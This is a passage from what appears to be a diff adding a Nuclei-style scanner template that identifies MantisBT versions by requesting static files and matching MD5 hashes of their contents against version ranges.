"(\"f650e7e9d98eb87533a736c3542f18a6\" == md5(body))" + + - method: GET + path: + - 
"{{BaseURL}}/docbook/Admin_Guide/en-US/About.xml" + + matchers: + - type: dsl + name: 2.0.0 - 2.19.1 + dsl: + - "(\"5610af32e408039ce5950d2d10b5108f\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"9d98ecd9ee400319e886e73fbc7c56f7\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"1fc9b46e38288ee3e1280dfb7b44d85f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/User_Management.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.19.1 + dsl: + - "(\"5cd44ff6192fba2cf4966dd08ac7bc0b\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"3f0241d6b54081e04a7863ffeb7bfe25\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/defaults.xml" + + matchers: + - type: dsl + name: 1.3.5 - 2.12.2 + dsl: + - "(\"e2a7020f4b6c12e8fe02b40a1cb4849a\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.4 + dsl: + - "(\"ef591d5f7af28891e16a1ae2c0b3c565\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.19.1 + dsl: + - "(\"4f2ae3ef252cf5c5072ecf6a4993abb0\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"9e81802c540223082413a4ca2362368c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/bugFilter.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.19.1 + dsl: + - "(\"12e0dbed3bb11b3436627df1fa521a92\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"674b95ad1e0f0b69c3c8d1bd2183f161\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"c1c07b11136a0db11a7d4e739f53c171\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/api.xml" + + matchers: + - type: dsl + name: 2.3.0 - 2.7.1 + dsl: + - "(\"4ac7af66b103d441f6b7fc4950727adc\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.19.1 + dsl: + - "(\"888c00d3b43b9c390f0334e662f71fbd\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"8df4f5b37cf538ad82d2d03e58c96287\" == md5(body))" + + - method: GET + 
path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_korean.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.17.2 + dsl: + - "(\"d89050e8f6baeac1cf364dcaa0938a82\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"325120daa788a852aaeb917d07832b22\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"9afb7504f23ef0574829d8c631a5d1e9\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.24.3 + dsl: + - "(\"22f35300e8bae8d4b4f914a4426811af\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/ace.min.css" + + matchers: + - type: dsl + name: 2.2.0 - 2.17.2 + dsl: + - "(\"0d402fa2406129b96dd755426478c1b4\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"8365b49cafe06e69f16135104c789d17\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.24.3 + dsl: + - "(\"02befb55d0870d1ab08c663366bc3361\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Contributors.xml" + + matchers: + - type: dsl + name: 2.6.0 - 2.17.2 + dsl: + - "(\"0b778e46f6bafb8c781a16c10f661fda\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.5.2 + dsl: + - "(\"2316362165e117458785fb9f5188c85b\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.24.3 + dsl: + - "(\"4ae956f9944ca20b4dab51bab756f392\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/ace.css" + + matchers: + - type: dsl + name: 2.2.0 - 2.14.0 + dsl: + - "(\"a43cf675668abcb7df974d67057b4402\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"57ac99bda9ae1bdf4dae8993c747405e\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.17.2 + dsl: + - "(\"6b62094dd219aae041b86df8bc27fe40\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.24.3 + dsl: + - "(\"2c17a8afcbe15c72ccef09cb07a6746a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/open-sans-v15-latin-ext-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"81d0487ba73afd292730e6f89e83c2ea\" == md5(body))" + + - method: GET + path: 
+ - "{{BaseURL}}/fonts/montserrat-v12-cyrillic-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"a2a3cd147df9e0612151fa8542e4b472\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/montserrat-v12-cyrillic-ext-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"da45fc1615e5aadb48c15cc0963de76d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/montserrat-v12-latin-ext-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"1119d054247d1182914a754403e3af6a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/open-sans-v15-latin-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"cffb686d7d2f4682df8342bd4d276e09\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/poppins-v5-latin-ext-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"257009726ee9341c25d0a8bb00f6c8a5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/poppins-v5-latin-ext-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"6fc407b725b0f9f3c7bd99efe9c9b232\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/poppins-v5-devanagari-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"53459fe489b4dcd4054116588e3cd192\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/open-sans-v15-vietnamese-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"60468fcc14ac48c9d83a54f87ecaaf49\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/poppins-v5-latin-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"ce0c9ae08840a0b43bccb9f5a86e155d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/open-sans-v15-cyrillic-ext-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"c4a9a5af7ec6e23da632fbc59ea9f48b\" == 
md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/poppins-v5-devanagari-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"08f9ec63b3615e0230a51de92a3c0ec1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/open-sans-v15-latin-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"bf2d0783515b7d75c35bde69e01b3135\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/open-sans-v15-greek-ext-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"85f6cabcf02592149e8d2a8828382ab4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/open-sans-v15-greek-ext-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"bdddca22419a3aeeb45c1e6e32c85ebf\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/poppins-v5-latin-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"1fce830e6112511a77108832e13172fd\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/open-sans-v15-vietnamese-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"c0328dd564c14e8f927a3094dacadcec\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/open-sans-v15-greek-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"c7fe1c527eca6602d47381453a6c752e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/montserrat-v12-vietnamese-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"fdddaad1faff8909d0a81c00ad3d4b7a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/open-sans-v15-cyrillic-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"717cff603d36688def7eb25fe772a791\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/montserrat-v12-latin-ext-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - 
"(\"bef7e247546617f705fd7b8e7ac4a962\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/montserrat-v12-vietnamese-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"a9449c25b74f409f70bea838e01de952\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/open-sans-v15-greek-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"f8067dc6a76122598490f24dcf71790d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/montserrat-v12-latin-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"f29d2b8559699b6beb5b29b25b8bc572\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/open-sans-v15-cyrillic-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"ca41c456ce6ba8dcffc9a7272a199283\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/montserrat-v12-cyrillic-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"a94a53ece6ec3d49129705386596a1fb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/open-sans-v15-latin-ext-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"2b6f63fce9104d1223d83dd12cd6038e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/montserrat-v12-latin-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"501ce09c42716a2f6e1503a25eb174c9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/montserrat-v12-cyrillic-ext-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"194b0c8e55426677a0eaf4c333490fe6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/open-sans-v15-cyrillic-ext-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"429a11ad779becf78b99c854ce49bab1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_italian.txt" + + matchers: + - 
type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"966b44a74ba67759efc71f9c09df4958\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_bengali.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.15.1 + dsl: + - "(\"b28a1a09bd1384038644197a5981e04e\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"e39524ab6c88673a8d542df5f56b7dc0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_bengali.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.15.1 + dsl: + - "(\"a47e6f2aeeec218e460fa7c2ade0ce53\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"e92e0fec1c9717a55d4520cdf6a43abc\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/fonts.css" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"c62cd6151b2a781c14f1f47622a3424d\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"04d7fd99a70a2a3be868f89b8f8b996a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_amharic.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.15.1 + dsl: + - "(\"ff6f7ca6db4768555ab08ce44774e0ed\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"c8b761048b59afb87a6c785238217898\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"342309ef258993a3e037af4557a42b32\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"2a2688003e8577b4efe4bd87712ac3d5\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"407e21be44d92d294c56b803a917f824\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"fe3b3ede269348369d81626d3bc2916c\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"77efad0008ab3e3516b48401ef3948e2\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"ef990cb0aaa1f655bb4c33492c1b76ee\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"59e57035e4e061e23a08c4c8e3095cf2\" == 
md5(body))" + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"b65020fd1bdb1defb1adc2bf23035bbe\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_icelandic.txt" + + matchers: + - type: dsl + name: 2.14.0 - 2.24.3 + dsl: + - "(\"cc4b04b7c9bad00e79ed0e4b891e4693\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_icelandic.txt" + + matchers: + - type: dsl + name: 2.14.0 - 2.24.3 + dsl: + - "(\"7819d21b66b47592c9c92388da31881b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_korean.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.13.2 + dsl: + - "(\"92dedcbdbaf8e21011c38d6ddca62b47\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.24.3 + dsl: + - "(\"b7a2a69f9a013640bb67650b16212ab0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_greek.txt" + + matchers: + - type: dsl + name: 2.0.0 - 2.13.2 + dsl: + - "(\"cf0b9c759d9ed770de4e69b0ad4965f9\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"fdcdaa14f718b5b7cf57cd41f8687120\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.24.3 + dsl: + - "(\"1617ac6c29c5a57b7f3f0ffe532df6ef\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Workflow.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.13.2 + dsl: + - "(\"7e86b278229808a00fed1eb2a0d32f3f\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.24.3 + dsl: + - "(\"b076f5646e0d7d8b245a30da0e8e3ba3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/myview.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.13.2 + dsl: + - "(\"580bd23d687853bb7950ec8568fa89c6\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.24.3 + dsl: + - "(\"92138a9f2982dbbfe7d18bbb1d3cd1fe\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/date.xml" + + matchers: + - type: dsl + name: 2.0.0 - 
2.8.1 + dsl: + - "(\"52723090d9158568cf08c3a4be527ba2\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"dafefcbdcc481f46211e8d91aa2d8324\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.13.2 + dsl: + - "(\"d36212e7c222ae3e03fc4ae76585ab91\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.24.3 + dsl: + - "(\"5af0f94c7b57dd3c6a9512844b718447\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/webserver.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.11.1 + dsl: + - "(\"6147dcbe54e195cb88643e6686726d2d\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"67c655d947a1c8de9592bbc9e8e314ce\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_georgian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"fb8a11aa872aaf252839cedf7c8b7ae2\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_piedmontese.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"52f6126718bf93470f44a6518d1f3161\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_georgian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"2476461935b7617a6297a9c41f1dc362\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_malay.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"445c74bf0c8b1f999f981eaa62f52fda\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_telugu.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"437903040f931943d527cfcefec17124\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_upper_sorbian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"beb3ab125bc3235bdf74e65c1254a784\" == md5(body))" + + - method: GET + 
path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_persian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"7a6f9032b30b9bee27f830a055fd0087\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_lower_sorbian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"97f3ce751f4dfb82997bd3d245acda27\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_malayalam.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"94ffcfcad7cc39f975586bb237a20d55\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_lezgi.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"4889d5565075d1884fdcf5d8f5064c25\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_tachelhit.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"445bff125e0095bc90f4123c7eb074d0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_bosnian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"f55e61df281638764528015435d4bc38\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_luxembourgish.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"db05d0e638e5f1a458b1e85fb2e80922\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_indonesian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"087d1d512f8cb3545c69dec204f7e1b3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_piedmontese.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"a33954ff3048ef824b3fc34b4a194d69\" == md5(body))" + + - method: GET + path: + - 
"{{BaseURL}}/plugins/XmlImportExport/lang/strings_georgian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"fed17663a6f39f44237525b877e9418e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_tunisian_arabic.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"45ab5b3d2d76438d9f500c22df4bfcbb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_zazaki.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"6068377b3b4fd7bd5af883f0ac5cc2d9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_mirandese.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"e84ba2159b76fce0ffa635aea71b8760\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_luxembourgish.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"a583a210fbd9f5d9d0bf105c9ef16e73\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.24.3 + dsl: + - "(\"975c77b1190b1617e8f638e7269a501e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_indonesian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"ac923215f26875ba9fb7b11636fa5799\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_danish.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"fd253676a2851741bae307fe948df40d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_russian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"d0308df73e048ea42e49dad36b0a08a9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_macedonian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"759d64dd26386ea5632a56f4d169e39d\" == md5(body))" + + - method: GET + path: + - 
"{{BaseURL}}/plugins/Gravatar/lang/strings_ukrainian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"56bd09dd8dd5e6c66451a89a9e0737f5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_belarusian_tarask.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"264c852a6cf5e2c5770f89dab065b2ed\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_swedish.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"16728d7d30bd819bbea578f3cae11294\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_chinese_traditional.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"d955514da415435e17762c8587f0f73b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_german.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"169d298b5d6c0afc5cc55857d89c7a47\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_portuguese_brazil.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"5133b16f3f8a073e98d60f8d9ac5c554\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_chinese_simplified.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"4d47be3189b8832001d5b48790dba324\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_portuguese_standard.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"65894c7fe3ed8345d6beecd1516c6f2f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_czech.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"aa98b6c123eaba84722737efab28b328\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_qqq.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - 
"(\"ed2e889dac809bbe83270b09cf568424\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_lb.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.10.1 + dsl: + - "(\"249a0ce7b31ae3f74f8524bf384b2007\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"a583a210fbd9f5d9d0bf105c9ef16e73\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_portuguese_standard.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.10.1 + dsl: + - "(\"50e7438f40368d27e166d6bbe2684499\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"c3fe9394b7d58508f66820b63a986430\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"9db00d02ba3a22e15ddc7c79139d9298\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"bf11ca473d9d9a23a6a73d42e75cc891\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"585d230f0320afe4a5726ef66c2c5580\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"89dd33f0079339e7b085ba14dd1b69a6\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"c56e1b73a672cdba9f1e46e7c43276bc\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"b5ca4116651515c4b08756f05127f012\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.24.3 + dsl: + - "(\"3ba8668f09056bc256b40107dd7655c5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_ka.txt" + + matchers: + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"fb8a11aa872aaf252839cedf7c8b7ae2\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_lki.txt" + + matchers: + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"cc69014c4f3c309ca4fd29bd38b9650a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_ml.txt" + + matchers: + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - 
"(\"94ffcfcad7cc39f975586bb237a20d55\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_te.txt" + + matchers: + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"437903040f931943d527cfcefec17124\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_ka.txt" + + matchers: + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"2476461935b7617a6297a9c41f1dc362\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_lki.txt" + + matchers: + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"f78db1de766a5aa41823365451b0f945\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_fa.txt" + + matchers: + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"7a6f9032b30b9bee27f830a055fd0087\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_lez.txt" + + matchers: + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"4889d5565075d1884fdcf5d8f5064c25\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_zh-hk.txt" + + matchers: + - type: dsl + name: 2.11.0 - 2.24.3 + dsl: + - 